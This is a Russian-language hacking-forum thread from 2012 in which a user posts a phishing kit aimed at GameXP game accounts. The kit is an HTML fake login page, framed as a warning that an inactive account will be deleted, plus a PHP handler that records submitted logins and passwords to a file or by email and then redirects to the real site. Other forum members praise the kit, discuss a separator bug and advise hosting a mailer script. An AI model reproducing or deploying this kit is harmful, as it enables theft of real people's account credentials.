ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости Mail-сервис (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   GameXP Теле письма (https://forum.antichat.xyz/showthread.php?t=8057912)

stivens20 18.06.2012 01:00

Привет!
Накатал фейк для Геймеров.
Скрин:


Фейк:

code:




















































Уважаемый пользователь!






Ваш аккаунт в Line Age долгое время был неактивен и может быть удален.







Чтобы избежать удаления аккаунта, вам достаточно просто Подтвердить:





GameXP | Паспорт















$(function(){
$('.navigation .first_lvl').hover(function(){
$('.navigation_sub',this).css({'display':'block'})
},function(){
$('.navigation_sub').css({'display':'none'})
});
var script_name = '/index.php';
$('ul.menu li').find('a').each(function() {
if ($(this).attr('href') == script_name) {
$(this).addClass('menu_current');
}
});
});










Подтверждение









Забыли пароль?

Зарегистрироваться







Логин:





Пароль:






Запомнить на 10 дней:






Подтвердить


















GameXP: Помощь


Если у вас возникли дополнительные вопросы или трудности с игрой, вы можете обратиться в нашу Службу заботы об игроках, которая работает 24 часа в сутки 7 дней в неделю, по адресу http://help.gamexp.ru.

Рекомендуем вам ознакомиться с дополнительными возможностями усиления безопасности вашей учетной записи.

Обратите внимание!


Ваша учетная запись действительна для всех игр и сервисов портала:

Все игры












Все сервисы

































Пользовательское соглашение

Copyright © NIKITA ONLINE. Все права защищены.














Обработчик:

code:

?php

$BASE="base.php";
$IS_EMAIL=false;
$LOCATION="http://gamexp.ru/";

$p0=$_REQUEST['login'];
$p1=$_REQUEST['password'];
$headers = "";
$info=" login:$p0$ pass:p1\n";

if ($IS_EMAIL){
mail($BASE, "*** Вам пришёл сюрприз!", $headers.$info);
} else {
$fd=fopen($BASE,"a+");
fwrite($fd,$info);
fclose($fd);
}

header("Location:$LOCATION");
?>

Удачи!

stix666 18.06.2012 01:00

И всё же

Цитата:

Сообщение от stivens20

$info="$p0:$p1:

Зачем после переменной p1 двуеточие?

STALKER 18.06.2012 01:00

Я ярый фанат игр.Попробую.думаю поправочке не нуждается фейк.

stivens20 18.06.2012 01:00

Цитата:

Сообщение от stix666

Зачем после переменной p1 двуеточие?

Вопрос не имеет смысла.все равно отвечу:чтоб различить логин и пасс в логах.
(кому как и на ваше усмотрение.

Yorvet 18.06.2012 01:00

Цитата:

Сообщение от stivens20

Вопрос не имеет смысла.все равно отвечу:чтоб различить логин и пасс в логах.
(кому как и на ваше усмотрение.

Вопрос был в другом. Разделяющее двоеточие идёт после первой переменной. А после второй оно лишнее. Замечу, что тот же арксфейкген при автогеренации обработчика допускает ту же ошибку, что намекает нам на инструментарий автора. Что в конечном счёте не имеет абсолютно никакого значения: если фейк работает и выглядит хорошо (что нельзя, к сожалению, увидеть на милипизерном скрине), то большего и не нужно. Молодец ещё раз.

stivens20 18.06.2012 01:00

Цитата:


если фейк работает и выглядит хорошо (что нельзя, к сожалению, увидеть на милипизерном скрине), то большего и не нужно



Чтоб посмотреть скрин фейк крупном плане просто шелкните на скрине.

Цитата:


Молодец ещё раз.



Спасибо Yorvet
Старался.

hac-san 23.06.2012 01:00

Фейк хороший
Но только у меня не хочет отсылаться

stivens20 24.06.2012 01:00

Цитата:

Сообщение от hac-san

Но только у меня не хочет отсылаться

Скрипт для анонимки есть?Возми отсюда закачай на хост свой

Rastamancik 28.06.2012 01:00

Шя гляним)

Rastamancik 30.06.2012 01:00

Прикрыли!


Время: 00:33